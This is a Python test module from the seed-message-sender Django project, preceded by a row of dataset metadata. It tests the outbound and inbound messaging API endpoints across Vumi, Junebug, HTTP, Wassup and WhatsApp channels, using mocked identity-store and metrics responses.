| 15.75 | 22 | 0.714286 | 9 | 63 | 5 | 0.555556 | 0.444444 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.190476 | 63 | 3 | 23 | 21 | 0.882353 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
96a739d34793b74351ab0a20278a16e2efba0e5b | 160,849 | py | Python | message_sender/tests.py | praekeltfoundation/seed-message-sender | d90ef4dc9fa248df97ca97f07569c6c70afcd1bd | [
"BSD-3-Clause"
] | 1 | 2017-01-03T08:53:18.000Z | 2017-01-03T08:53:18.000Z | message_sender/tests.py | praekelt/seed-message-sender | d90ef4dc9fa248df97ca97f07569c6c70afcd1bd | [
"BSD-3-Clause"
] | 45 | 2016-03-16T09:32:27.000Z | 2018-06-28T10:05:19.000Z | message_sender/tests.py | praekeltfoundation/seed-message-sender | d90ef4dc9fa248df97ca97f07569c6c70afcd1bd | [
"BSD-3-Clause"
] | 1 | 2016-09-28T09:32:05.000Z | 2016-09-28T09:32:05.000Z | import base64
import gzip
import hmac
import json
import logging
import os
import uuid
from datetime import date, datetime, timedelta
from hashlib import sha256
from unittest import mock
from unittest.mock import MagicMock, patch, call
from urllib.parse import urlencode, urlparse
import responses
from celery.exceptions import Retry
from django.conf import settings
from django.contrib.auth.models import User
from django.core.management import call_command
from django.db.models.signals import post_save
from django.test import TestCase, override_settings
from django.urls import reverse
from django.utils import timezone
from go_http.send import LoggingSender
from requests_testadapter import TestAdapter, TestSession
from rest_framework import status
from rest_framework.authtoken.models import Token
from rest_framework.test import APIClient
from rest_hooks.models import Hook
from requests import exceptions as requests_exceptions
from seed_services_client.metrics import MetricsApiClient
from seed_message_sender.utils import load_callable
from . import tasks
from .factory import (
HttpApiSender,
HttpApiSenderException,
JunebugApiSender,
MessageClientFactory,
WassupApiSenderException,
WhatsAppApiSender,
WhatsAppApiSenderException,
)
from .models import (
AggregateOutbounds,
ArchivedOutbounds,
Channel,
IdentityLookup,
Inbound,
Outbound,
OutboundSendFailure,
)
from .serializers import OutboundArchiveSerializer
from .signals import psh_fire_msg_action_if_new
from .tasks import (
ConcurrencyLimiter,
SendMessage,
fire_metric,
requeue_failed_tasks,
send_message,
)
from .views import fire_delivery_hook
class VumiLoggingSender(LoggingSender):
    """Test double for the Vumi sender that logs instead of sending."""

    def send_text(self, *args, **kwargs):
        # LoggingSender.send_text does not accept a metadata kwarg, so drop
        # it before delegating.
        kwargs.pop("metadata", None)
        return super().send_text(*args, **kwargs)

    def send_image(self, to_addr, content, image_url=None):
        # Mirrors the real Vumi channel, which has no image support.
        raise HttpApiSenderException("Sending images not available on this channel.")
# Module-level monkeypatch: keep a reference to the real factory, then make
# every SendMessage task use the logging test double instead of a live
# channel client for the duration of this test module.
get_client_original = SendMessage.get_client
SendMessage.get_client = lambda x, y: VumiLoggingSender("go_http.test")
def make_channels():
    """Create the fixture Channel rows used throughout these tests.

    Behaviour is identical to creating each channel individually; the
    definitions are just driven from a single table instead of ten
    copy-pasted stanzas.  Only JUNE_TEXT is the default channel.
    """
    vumi_config = {
        "VUMI_CONVERSATION_KEY": "conv-key",
        "VUMI_ACCOUNT_KEY": "account-key",
        "VUMI_ACCOUNT_TOKEN": "account-token",
        "VUMI_API_URL": "http://example.com/",
    }
    june_config = {
        "JUNEBUG_API_URL": "http://example.com/",
        "JUNEBUG_API_AUTH": ("username", "password"),
        "JUNEBUG_API_FROM": "+4321",
    }
    http_config = {
        "HTTP_API_URL": "http://example.com/",
        "HTTP_API_AUTH": ("username", "password"),
        "HTTP_API_FROM": "+4321",
    }
    wassup_config = {
        "WASSUP_API_URL": "http://example.com/",
        "WASSUP_API_TOKEN": "http-api-token",
        "WASSUP_API_HSM_UUID": "the-uuid",
        "WASSUP_API_NUMBER": "+4321",
    }
    whatsapp_config = {
        "API_URL": "http://example.com/",
        "API_TOKEN": "http-api-token",
        "HSM_NAMESPACE": "whatsapp:hsm:test",
        "HSM_ELEMENT_NAME": "test",
    }
    # (channel_id, channel_type, default, configuration, limit, timeout, delay)
    definitions = [
        ("VUMI_TEXT", Channel.VUMI_TYPE, False, dict(vumi_config), 1, 20, 10),
        ("VUMI_VOICE", Channel.VUMI_TYPE, False, dict(vumi_config), 1, 20, 10),
        ("JUNE_VOICE", Channel.JUNEBUG_TYPE, False, dict(june_config), 1, 120, 100),
        ("JUNE_TEXT", Channel.JUNEBUG_TYPE, True, dict(june_config), 0, 0, 0),
        ("JUNE_VOICE2", Channel.JUNEBUG_TYPE, False, dict(june_config), 2, 20, 10),
        ("HTTP_API_TEXT", Channel.HTTP_API_TYPE, False, dict(http_config), 0, 0, 0),
        ("HTTP_API_VOICE", Channel.HTTP_API_TYPE, False, dict(http_config), 2, 20, 10),
        ("WASSUP_API", Channel.WASSUP_API_TYPE, False, dict(wassup_config), 0, 0, 0),
        (
            "WASSUP_API_NON_HSM",
            Channel.WASSUP_API_TYPE,
            False,
            dict(wassup_config, WASSUP_API_HSM_DISABLED=True),
            0,
            0,
            0,
        ),
        ("WHATSAPP", Channel.WHATSAPP_API_TYPE, False, dict(whatsapp_config), 0, 0, 0),
    ]
    for channel_id, channel_type, default, config, limit, timeout, delay in definitions:
        Channel.objects.create(
            channel_id=channel_id,
            channel_type=channel_type,
            default=default,
            configuration=config,
            concurrency_limit=limit,
            message_timeout=timeout,
            message_delay=delay,
        )
class RecordingAdapter(TestAdapter):
    """Test adapter that records the last request it handled.

    The request is kept on ``self.request`` so tests can assert on the
    method/URL/body that was actually sent through the session.
    """

    request = None  # last request object passed to send()

    def send(self, request, *args, **kw):
        self.request = request
        # Py3-style super(); the rest of the file is Python 3 only.
        return super().send(request, *args, **kw)
class RecordingHandler(logging.Handler):
    """Logging handler that keeps every record it receives.

    ``logs`` stays None until the first record arrives, so tests can
    distinguish "nothing logged" from "logged an empty list".
    """

    logs = None  # lazily created list of LogRecord objects

    def emit(self, record):
        """Append *record* to ``self.logs``, creating the list on demand."""
        collected = self.logs if self.logs is not None else []
        collected.append(record)
        self.logs = collected
class MockCache(object):
    """In-memory stand-in for Django's cache used by the concurrency limiter.

    Implements the subset of the cache API the tests exercise: ``get``,
    ``get_or_set``, ``add``, ``incr`` and ``decr``.  ``expire`` arguments
    are accepted but ignored, since entries never time out in tests.
    """

    def __init__(self):
        self.cache_data = {}

    def get(self, key):
        """Return the cached value, or None when *key* is missing."""
        return self.cache_data.get(key, None)

    def get_or_set(self, key, value, expire=0):
        """Store *value* if *key* is absent; return whatever is stored."""
        if key not in self.cache_data:
            self.cache_data[key] = value
            return value
        return self.cache_data[key]

    def add(self, key, value, expire=0):
        """Store *value* only if *key* is absent; True iff it was stored."""
        if key not in self.cache_data:
            self.cache_data[key] = value
            return True
        return False

    def incr(self, key, value=1):
        """Increment an existing key, mirroring Django's ``cache.incr``.

        Raises ValueError (naming the key, instead of the original bare
        ``raise (ValueError)``) when the key does not exist, and returns
        the new value like the real cache backend does.
        """
        if key not in self.cache_data:
            raise ValueError("Key %r not found" % (key,))
        self.cache_data[key] += value
        return self.cache_data[key]

    def decr(self, key, value=1):
        """Decrement an existing key; raises ValueError when missing."""
        if key not in self.cache_data:
            raise ValueError("Key %r not found" % (key,))
        self.cache_data[key] -= value
        return self.cache_data[key]
class APITestCase(TestCase):
    """Base test case providing plain and admin API clients plus a
    recording HTTP session for metric assertions."""

    def setUp(self):
        self.client = APIClient()
        self.adminclient = APIClient()
        self.session = TestSession()
class AuthenticatedAPITestCase(APITestCase):
    """Test base that authenticates both API clients, patches the metric
    client, records ``go_http.test`` logs and creates the fixture channels.

    Also provides helpers to create Outbound/Inbound rows directly and to
    register common ``responses`` mocks for the identity store and metrics
    API.
    """

    def make_outbound(
        self, to_addr="+27820000123", to_identity="0c03d360", channel=None
    ):
        """Create an Outbound row directly (post-save send hook disabled)
        and return its id as a string."""
        if channel:
            channel = Channel.objects.get(channel_id=channel)
        self._replace_post_save_hooks_outbound()  # don't let fixtures fire
        outbound_message = {
            "to_addr": to_addr,
            "to_identity": to_identity,
            "vumi_message_id": "075a32da-e1e4-4424-be46-1d09b71056fd",
            "content": "Simple outbound message",
            "delivered": False,
            "attempts": 1,
            "metadata": {},
            "channel": channel,
        }
        outbound = Outbound.objects.create(**outbound_message)
        self._restore_post_save_hooks_outbound()  # let tests fire tasks
        return str(outbound.id)

    def make_inbound(self, in_reply_to, from_addr="+27820000020", from_identity=""):
        """Create an Inbound row replying to *in_reply_to* and return its
        id as a string."""
        inbound_message = {
            "message_id": str(uuid.uuid4()),
            "in_reply_to": in_reply_to,
            "to_addr": "+27820000123",
            "from_addr": from_addr,
            "from_identity": from_identity,
            "content": "Call delivered",
            "transport_name": "test_voice",
            "transport_type": "voice",
            "helper_metadata": {},
        }
        inbound = Inbound.objects.create(**inbound_message)
        return str(inbound.id)

    def _replace_get_metric_client(self, session=None):
        # Swapped in for tasks.get_metric_client during setUp so metric
        # calls hit the test session, not a live service.
        return MetricsApiClient(
            url=settings.METRICS_URL, auth=settings.METRICS_AUTH, session=session
        )

    def _restore_get_metric_client(self, session=None):
        return MetricsApiClient(
            url=settings.METRICS_URL, auth=settings.METRICS_AUTH, session=session
        )

    def _replace_post_save_hooks_outbound(self):
        # Disconnect the "send on create" signal so fixtures don't fire.
        post_save.disconnect(
            psh_fire_msg_action_if_new,
            sender=Outbound,
            dispatch_uid="psh_fire_msg_action_if_new",
        )

    def _restore_post_save_hooks_outbound(self):
        post_save.connect(
            psh_fire_msg_action_if_new,
            sender=Outbound,
            dispatch_uid="psh_fire_msg_action_if_new",
        )

    def check_request(self, request, method, params=None, data=None, headers=None):
        """Assert that *request* was made with the given method and, when
        supplied, the given query params, headers and JSON body."""
        # BUG FIX: the module imports the ``urlparse`` *function* from
        # urllib.parse, so the previous Python 2 style attribute access
        # (``urlparse.urlparse`` / ``urlparse.parse_qsl``) raised
        # AttributeError whenever ``params`` was passed.
        from urllib.parse import parse_qsl

        self.assertEqual(request.method, method)
        if params is not None:
            url = urlparse(request.url)
            qs = parse_qsl(url.query)
            self.assertEqual(dict(qs), params)
        if headers is not None:
            for key, value in headers.items():
                self.assertEqual(request.headers[key], value)
        if data is None:
            self.assertEqual(request.body, None)
        else:
            self.assertEqual(json.loads(request.body), data)

    def _mount_session(self):
        """Mount a RecordingAdapter on the metrics URL and return it."""
        response = [{"name": "foo", "value": 9000, "aggregator": "bar"}]
        adapter = RecordingAdapter(json.dumps(response).encode("utf-8"))
        self.session.mount("http://metrics-url/metrics/", adapter)
        return adapter

    def setUp(self):
        super().setUp()
        tasks.get_metric_client = self._replace_get_metric_client
        self.adapter = self._mount_session()
        self.username = "testuser"
        self.password = "testpass"
        self.user = User.objects.create_user(
            self.username, "testuser@example.com", self.password
        )
        token = Token.objects.create(user=self.user)
        self.token = token.key
        self.client.credentials(HTTP_AUTHORIZATION="Token " + self.token)
        self.superuser = User.objects.create_superuser(
            "testsu", "su@example.com", "dummypwd"
        )
        sutoken = Token.objects.create(user=self.superuser)
        self.adminclient.credentials(HTTP_AUTHORIZATION="Token %s" % sutoken)
        # Capture everything VumiLoggingSender logs so check_logs can see it.
        self.handler = RecordingHandler()
        logger = logging.getLogger("go_http.test")
        logger.setLevel(logging.INFO)
        logger.addHandler(self.handler)
        make_channels()

    def tearDown(self):
        tasks.get_metric_client = self._restore_get_metric_client

    def check_logs(self, msg):
        """Return True iff a recorded log line equals *msg*."""
        if self.handler.logs is None:  # nothing to check
            return False
        # isinstance instead of ``type(...) != list`` (same behaviour).
        if not isinstance(self.handler.logs, list):
            [logs] = self.handler.logs
        else:
            logs = self.handler.logs
        for log in logs:
            logline = log.msg.replace("u'", "'")
            if logline == msg:
                return True
        return False

    def add_identity_search_response(self, msisdn, identity, count=1):
        """Mock the identity-store msisdn search returning *count* copies
        of *identity* (count=0 simulates an unknown address)."""
        msisdn = msisdn.replace("+", "%2B")
        results = [
            {
                "id": identity,
                "version": 1,
                "details": {
                    "default_addr_type": "msisdn",
                    "addresses": {"msisdn": {msisdn: {}}},
                },
            }
        ] * count
        response = {"next": None, "previous": None, "results": results}
        qs = "?details__addresses__msisdn=%s" % msisdn
        responses.add(
            responses.GET,
            "%s/identities/search/%s" % (settings.IDENTITY_STORE_URL, qs),  # noqa
            json=response,
            status=200,
            match_querystring=True,
        )

    def add_create_identity_response(self, identity, msisdn):
        """Mock the identity-store create endpoint for *msisdn*."""
        identity = {
            "id": identity,
            "version": 1,
            "details": {
                "default_addr_type": "msisdn",
                "addresses": {"msisdn": {msisdn: {}}},
                "risk": "high",
            },
            "communicate_through": None,
            "operator": None,
            "created_at": "2016-04-21T09:11:05.725680Z",
            "created_by": 2,
            "updated_at": "2016-06-15T15:09:05.333526Z",
            "updated_by": 2,
        }
        responses.add(
            responses.POST,
            "%s/identities/" % settings.IDENTITY_STORE_URL,
            json=identity,
            status=201,
        )

    def add_metrics_response(self):
        """Mock the metrics API fire endpoint."""
        responses.add(
            responses.POST, "http://metrics-url/metrics/", json={}, status=201
        )
class TestWassupMessagesAPI(AuthenticatedAPITestCase):
    """API tests for outbound messages sent over the Wassup channel."""

    @responses.activate
    @patch("message_sender.tests.VumiLoggingSender.send_image")
    def test_create_outbound_image(self, mock_send_image):
        """
        When creating a outbound with a image_url in the metadata, the
        send_image function should be called with the correct parameters.
        """
        mock_send_image.return_value = {"message_id": str(uuid.uuid4())}
        self.add_metrics_response()
        self.add_identity_search_response("+27820000123", "0c03d360")

        payload = {
            "to_addr": "+27820000123",
            "delivered": "false",
            "metadata": {"image_url": "https://foo.com/file.jpg"},
            "channel": "WASSUP_API",
            "content": "Check this image",
        }
        resp = self.client.post(
            "/api/v1/outbound/",
            json.dumps(payload),
            content_type="application/json",
        )

        self.assertEqual(resp.status_code, status.HTTP_201_CREATED)
        mock_send_image.assert_called_with(
            "+27820000123", "Check this image", image_url="https://foo.com/file.jpg"
        )
class TestVumiMessagesAPI(AuthenticatedAPITestCase):
    def test_list_pagination_one_page(self):
        """A single outbound fits on one page: no next/previous links."""
        outbound = self.make_outbound()
        response = self.client.get("/api/v1/outbound/")
        body = response.json()
        self.assertEqual(len(body["results"]), 1)
        self.assertEqual(body["results"][0]["id"], outbound)
        self.assertIsNone(body["previous"])
        self.assertIsNone(body["next"])
    def test_list_pagination_two_pages(self):
        """Three outbounds paginate across two pages (page size is 2 here),
        newest first, and the next/previous links navigate both ways."""
        outbounds = []
        for i in range(3):
            outbounds.append(self.make_outbound())
        # Test first page
        response = self.client.get("/api/v1/outbound/")
        body = response.json()
        self.assertEqual(len(body["results"]), 2)
        self.assertEqual(body["results"][0]["id"], outbounds[2])
        self.assertEqual(body["results"][1]["id"], outbounds[1])
        self.assertIsNone(body["previous"])
        self.assertIsNotNone(body["next"])
        # Test next page
        response = self.client.get(body["next"])
        body = response.json()
        self.assertEqual(len(body["results"]), 1)
        self.assertEqual(body["results"][0]["id"], outbounds[0])
        self.assertIsNotNone(body["previous"])
        self.assertIsNone(body["next"])
        # Test going back to previous page works
        response = self.client.get(body["previous"])
        body = response.json()
        self.assertEqual(len(body["results"]), 2)
        self.assertEqual(body["results"][0]["id"], outbounds[2])
        self.assertEqual(body["results"][1]["id"], outbounds[1])
        self.assertIsNone(body["previous"])
        self.assertIsNotNone(body["next"])
    @responses.activate
    def test_create_outbound_data(self):
        """
        When creating an outbound message, it should save a new Outbound
        object with the correct specified values.
        """
        self.add_metrics_response()
        self.add_identity_search_response("+27820000123", "0c03d360")
        post_outbound = {
            "to_addr": "+27820000123",
            "vumi_message_id": "075a32da-e1e4-4424-be46-1d09b71056fd",
            "content": "Say something",
            "delivered": False,
            "attempts": 0,
            "metadata": {},
            "resend": True,
        }
        response = self.client.post(
            "/api/v1/outbound/",
            json.dumps(post_outbound),
            content_type="application/json",
        )
        self.assertEqual(response.status_code, status.HTTP_201_CREATED)
        d = Outbound.objects.last()
        self.assertIsNotNone(d.id)
        self.assertEqual(d.version, 1)
        self.assertEqual(str(d.to_addr), "+27820000123")
        self.assertEqual(str(d.to_identity), "0c03d360")
        self.assertEqual(d.content, "Say something")
        self.assertEqual(d.delivered, False)
        # Posted attempts=0 but 1 is expected — presumably incremented by
        # the send fired on creation; confirm against the send task.
        self.assertEqual(d.attempts, 1)
        self.assertEqual(d.metadata, {})
        self.assertEqual(d.resend, True)
    @responses.activate
    def test_create_outbound_data_simple(self):
        """
        When creating a new outbound message, leaving out the optional fields
        in the request should still create an Outbound object.
        """
        self.add_metrics_response()
        self.add_identity_search_response("+27820000123", "0c03d360")
        post_outbound = {
            "to_addr": "+27820000123",
            "delivered": "false",
            "metadata": {"voice_speech_url": "https://foo.com/file.mp3"},
        }
        response = self.client.post(
            "/api/v1/outbound/",
            json.dumps(post_outbound),
            content_type="application/json",
        )
        self.assertEqual(response.status_code, status.HTTP_201_CREATED)
        d = Outbound.objects.last()
        self.assertIsNotNone(d.id)
        self.assertEqual(d.version, 1)
        self.assertEqual(str(d.to_addr), "+27820000123")
        # to_identity is filled in from the identity-store search mock.
        self.assertEqual(str(d.to_identity), "0c03d360")
        self.assertEqual(d.delivered, False)
        self.assertEqual(d.attempts, 1)
        self.assertEqual(d.metadata, {"voice_speech_url": "https://foo.com/file.mp3"})
        self.assertEqual(d.channel, None)
    @responses.activate
    def test_create_outbound_data_new_identity(self):
        """
        When creating a new outbound message, if the identity is not supplied,
        and the identity does not exist in the identity store, a new identity
        should be created on the identity store for that address.
        """
        self.add_metrics_response()
        # count=0 -> the search returns no identities for this msisdn.
        self.add_identity_search_response("+27820012345", None, 0)
        self.add_create_identity_response("0c03d360123", "+27820012345")
        post_outbound = {
            "to_addr": "+27820012345",
            "delivered": "false",
            "metadata": {"voice_speech_url": "https://foo.com/file.mp3"},
        }
        response = self.client.post(
            "/api/v1/outbound/",
            json.dumps(post_outbound),
            content_type="application/json",
        )
        self.assertEqual(response.status_code, status.HTTP_201_CREATED)
        d = Outbound.objects.last()
        self.assertIsNotNone(d.id)
        self.assertEqual(d.version, 1)
        self.assertEqual(str(d.to_addr), "+27820012345")
        self.assertEqual(str(d.to_identity), "0c03d360123")
        self.assertEqual(d.delivered, False)
        self.assertEqual(d.attempts, 1)
        self.assertEqual(d.metadata, {"voice_speech_url": "https://foo.com/file.mp3"})
        self.assertEqual(d.channel, None)
        # Second mocked HTTP call is the identity-store create POST.
        create_id_post = responses.calls[1]
        self.assertEqual(
            json.loads(create_id_post.request.body),
            {
                "details": {
                    "default_addr_type": "msisdn",
                    "addresses": {"msisdn": {"+27820012345": {"default": True}}},
                }
            },
        )
    @responses.activate
    def test_create_outbound_data_with_channel(self):
        """
        When creating an outbound message, if the channel is specified, then
        that Outbound should have the specified channel.
        """
        self.add_metrics_response()
        self.add_identity_search_response("+27820000123", "0c03d360")
        post_outbound = {
            "to_addr": "+27820000123",
            "delivered": "false",
            "metadata": {"voice_speech_url": "https://foo.com/file.mp3"},
            "channel": "JUNE_TEXT",
        }
        response = self.client.post(
            "/api/v1/outbound/",
            json.dumps(post_outbound),
            content_type="application/json",
        )
        self.assertEqual(response.status_code, status.HTTP_201_CREATED)
        d = Outbound.objects.last()
        self.assertIsNotNone(d.id)
        self.assertEqual(d.version, 1)
        self.assertEqual(str(d.to_addr), "+27820000123")
        self.assertEqual(str(d.to_identity), "0c03d360")
        self.assertEqual(d.delivered, False)
        self.assertEqual(d.attempts, 1)
        self.assertEqual(d.metadata, {"voice_speech_url": "https://foo.com/file.mp3"})
        self.assertEqual(d.channel.channel_id, "JUNE_TEXT")
    def test_create_outbound_data_with_channel_unknown(self):
        """Posting with a channel id that doesn't exist is a 400."""
        post_outbound = {
            "to_addr": "+27820000123",
            "delivered": "false",
            "metadata": {"voice_speech_url": "https://foo.com/file.mp3"},
            "channel": "JUNE_VOICE_TEST",
        }
        response = self.client.post(
            "/api/v1/outbound/",
            json.dumps(post_outbound),
            content_type="application/json",
        )
        self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
    def test_create_outbound_without_recipient(self):
        """Posting with neither to_addr nor to_identity is a 400."""
        post_outbound = {"delivered": "false", "metadata": {}}
        response = self.client.post(
            "/api/v1/outbound/",
            json.dumps(post_outbound),
            content_type="application/json",
        )
        self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
    @responses.activate
    def test_create_outbound_identity_only(self):
        """
        When only the identity UUID is specified, the resulting created
        Outbound object should have the address that was looked up from the
        identity store on it.
        """
        self.add_metrics_response()
        uid = "test-test-test-test"
        # mock identity address lookup
        responses.add(
            responses.GET,
            "%s/identities/%s/addresses/msisdn?default=True&use_communicate_through=True"
            % (settings.IDENTITY_STORE_URL, uid),  # noqa
            json={
                "next": None,
                "previous": None,
                "results": [{"address": "+26773000000"}],
            },
            status=200,
            content_type="application/json",
            match_querystring=True,
        )
        post_outbound = {"to_identity": uid, "delivered": "false", "metadata": {}}
        response = self.client.post(
            "/api/v1/outbound/",
            json.dumps(post_outbound),
            content_type="application/json",
        )
        self.assertEqual(response.status_code, status.HTTP_201_CREATED)
        d = Outbound.objects.last()
        self.assertIsNotNone(d.id)
        self.assertEqual(d.version, 1)
        self.assertEqual(d.to_addr, "+26773000000")
        self.assertEqual(d.to_identity, uid)
        self.assertEqual(d.delivered, False)
        self.assertEqual(d.attempts, 1)
        self.assertEqual(d.metadata, {})
        self.assertEqual(d.channel, None)
    def test_update_outbound_data(self):
        """PATCHing an outbound updates the given fields in place."""
        existing = self.make_outbound()
        patch_outbound = {"delivered": "true", "attempts": 2}
        response = self.client.patch(
            "/api/v1/outbound/%s/" % existing,
            json.dumps(patch_outbound),
            content_type="application/json",
        )
        self.assertEqual(response.status_code, status.HTTP_200_OK)
        d = Outbound.objects.get(pk=existing)
        self.assertEqual(d.version, 1)
        self.assertEqual(str(d.to_addr), "+27820000123")
        self.assertEqual(d.delivered, True)
        self.assertEqual(d.attempts, 2)
    def test_delete_outbound_data(self):
        """DELETE removes the outbound row entirely."""
        existing = self.make_outbound()
        response = self.client.delete(
            "/api/v1/outbound/%s/" % existing, content_type="application/json"
        )
        self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)
        d = Outbound.objects.filter(id=existing).count()
        self.assertEqual(d, 0)
    def test_created_at_filter_outbound_exists(self):
        """An outbound inside the before/after window is returned."""
        existing = Outbound.objects.get(pk=self.make_outbound())
        response = self.client.get(
            "/api/v1/outbound/?%s"
            % (
                urlencode(
                    {
                        "before": (existing.created_at + timedelta(days=1)).isoformat(),
                        "after": (existing.created_at - timedelta(days=1)).isoformat(),
                    }
                )
            )
        )
        self.assertEqual(response.status_code, status.HTTP_200_OK)
        self.assertEqual(len(response.data["results"]), 1)
        self.assertEqual(response.data["results"][0]["id"], str(existing.id))
    def test_created_at_filter_outbound_not_exists(self):
        """An inverted (empty) before/after window returns no results."""
        existing = Outbound.objects.get(pk=self.make_outbound())
        response = self.client.get(
            "/api/v1/outbound/?%s"
            % (
                urlencode(
                    {
                        "before": (existing.created_at - timedelta(days=1)).isoformat(),
                        "after": (existing.created_at + timedelta(days=1)).isoformat(),
                    }
                )
            )
        )
        self.assertEqual(response.status_code, status.HTTP_200_OK)
        self.assertEqual(response.data["results"], [])
    def test_to_addr_filter_outbound(self):
        """
        When filtering on to_addr, only the outbound with the specified to
        address should be returned.
        """
        self.make_outbound(to_addr="+1234")
        self.make_outbound(to_addr="+4321")
        response = self.client.get(
            "/api/v1/outbound/?{}".format(urlencode({"to_addr": "+1234"}))
        )
        self.assertEqual(response.status_code, status.HTTP_200_OK)
        self.assertEqual(len(response.data["results"]), 1)
    def test_to_addr_filter_outbound_multiple(self):
        """
        When filtering on to_addr, if multiple values are presented for the
        to address, we should return all outbound messages that match one of
        the to addresses.
        """
        self.make_outbound(to_addr="+1234")
        self.make_outbound(to_addr="+4321")
        self.make_outbound(to_addr="+1111")
        # Repeated query parameter -> OR semantics across the two values.
        response = self.client.get(
            "/api/v1/outbound/?{}".format(
                urlencode((("to_addr", "+1234"), ("to_addr", "+4321")))
            )
        )
        self.assertEqual(response.status_code, status.HTTP_200_OK)
        self.assertEqual(len(response.data["results"]), 2)
    def test_to_identity_filter_outbound(self):
        """
        When filtering on to_identity, only outbound messages with that
        identity id should be returned.
        """
        self.make_outbound(to_identity="1234")
        self.make_outbound(to_identity="4321")
        response = self.client.get(
            "/api/v1/outbound/?{}".format(urlencode((("to_identity", "1234"),)))
        )
        self.assertEqual(response.status_code, status.HTTP_200_OK)
        self.assertEqual(len(response.data["results"]), 1)
    def test_to_identity_filter_outbound_multiple(self):
        """
        When filtering on to_identity, if multiple values are presented for the
        identity ID, we should return all outbound messages that match one of
        the identity IDs.
        """
        self.make_outbound(to_identity="1234")
        self.make_outbound(to_identity="4321")
        self.make_outbound(to_identity="1111")
        response = self.client.get(
            "/api/v1/outbound/?{}".format(
                urlencode((("to_identity", "1234"), ("to_identity", "4321")))
            )
        )
        self.assertEqual(response.status_code, status.HTTP_200_OK)
        self.assertEqual(len(response.data["results"]), 2)
    def test_created_at_ordering_filter_outbound(self):
        """
        We should be able to order the results of the Outbound list endpoint
        by the created_at timestamp.
        """
        out1 = self.make_outbound()
        out2 = self.make_outbound()
        response = self.client.get(
            "/api/v1/outbound/?{}".format(urlencode({"ordering": "created_at"}))
        )
        self.assertEqual([o["id"] for o in response.data["results"]], [out1, out2])
        # A "-" prefix reverses the ordering.
        response = self.client.get(
            "/api/v1/outbound/?{}".format(urlencode({"ordering": "-created_at"}))
        )
        self.assertEqual([o["id"] for o in response.data["results"]], [out2, out1])
    def test_from_addr_filter_inbound(self):
        """
        When filtering on from_addr, only the inbounds with the specified from
        address should be returned.
        """
        self.make_inbound("1234", from_addr="+1234")
        self.make_inbound("1234", from_addr="+4321")
        response = self.client.get(
            "/api/v1/inbound/?{}".format(urlencode({"from_addr": "+1234"}))
        )
        self.assertEqual(response.status_code, status.HTTP_200_OK)
        self.assertEqual(len(response.data["results"]), 1)
    def test_from_addr_filter_inbound_multiple(self):
        """
        When filtering on from_addr, if multiple values are presented for the
        from address, we should return all inbound messages that match one of
        the from addresses.
        """
        self.make_inbound("1234", from_addr="+1234")
        self.make_inbound("1234", from_addr="+4321")
        self.make_inbound("1234", from_addr="+1111")
        response = self.client.get(
            "/api/v1/inbound/?{}".format(
                urlencode((("from_addr", "+1234"), ("from_addr", "+4321")))
            )
        )
        self.assertEqual(response.status_code, status.HTTP_200_OK)
        self.assertEqual(len(response.data["results"]), 2)
    def test_from_identity_filter_inbound(self):
        """
        When filtering on from_identity, only the inbounds with the specified
        identity ID should be returned.
        """
        self.make_inbound("1234", from_identity="1234")
        self.make_inbound("1234", from_identity="4321")
        response = self.client.get(
            "/api/v1/inbound/?{}".format(urlencode({"from_identity": "1234"}))
        )
        self.assertEqual(response.status_code, status.HTTP_200_OK)
        self.assertEqual(len(response.data["results"]), 1)
    def test_from_identity_filter_inbound_multiple(self):
        """
        When filtering on from_identity, if multiple values are presented for
        the from identity IDs, we should return all inbound messages that match
        one of the from identity IDs.
        """
        self.make_inbound("1234", from_identity="1234")
        self.make_inbound("1234", from_identity="4321")
        self.make_inbound("1234", from_identity="1111")
        response = self.client.get(
            "/api/v1/inbound/?{}".format(
                urlencode((("from_identity", "1234"), ("from_identity", "4321")))
            )
        )
        self.assertEqual(response.status_code, status.HTTP_200_OK)
        self.assertEqual(len(response.data["results"]), 2)
    def test_created_at_ordering_filter_inbound(self):
        """
        We should be able to order the results of the Inbound list endpoint
        by the created_at timestamp.
        """
        in1 = self.make_inbound("1234")
        in2 = self.make_inbound("1234")
        response = self.client.get(
            "/api/v1/inbound/?{}".format(urlencode({"ordering": "created_at"}))
        )
        self.assertEqual([i["id"] for i in response.data["results"]], [in1, in2])
        # A "-" prefix reverses the ordering.
        response = self.client.get(
            "/api/v1/inbound/?{}".format(urlencode({"ordering": "-created_at"}))
        )
        self.assertEqual([i["id"] for i in response.data["results"]], [in2, in1])
    @responses.activate
    def test_create_inbound_data_no_limit(self):
        """
        When there is no concurrency limit set, then for inbound messages,
        the concurrency limiter should not decrement.
        """
        self.add_metrics_response()
        self.add_identity_search_response("+27820000020", "0c03d360")
        existing_outbound = self.make_outbound()
        out = Outbound.objects.get(pk=existing_outbound)
        message_id = str(uuid.uuid4())
        post_inbound = {
            "message_id": message_id,
            "in_reply_to": out.vumi_message_id,
            "to_addr": "+27820000123",
            "from_addr": "+27820000020",
            "content": "Call delivered",
            "transport_name": "test_voice",
            "transport_type": "voice",
            "helper_metadata": {},
        }
        # VUMI_TEXT has concurrency_limit=1 but no timing metadata on the
        # outbound, so the limiter must not decrement.
        with patch.object(ConcurrencyLimiter, "decr_message_count") as mock_method:
            response = self.client.post(
                "/api/v1/inbound/VUMI_TEXT/",
                json.dumps(post_inbound),
                content_type="application/json",
            )
            mock_method.assert_not_called()
        self.assertEqual(response.status_code, status.HTTP_201_CREATED)
        d = Inbound.objects.last()
        self.assertIsNotNone(d.id)
        self.assertEqual(d.message_id, message_id)
        self.assertEqual(d.to_addr, "+27820000123")
        # from_addr is blanked and the looked-up identity stored instead —
        # presumably to avoid persisting the raw MSISDN; confirm in the view.
        self.assertEqual(d.from_addr, "")
        self.assertEqual(d.from_identity, "0c03d360")
        self.assertEqual(d.content, "Call delivered")
        self.assertEqual(d.transport_name, "test_voice")
        self.assertEqual(d.transport_type, "voice")
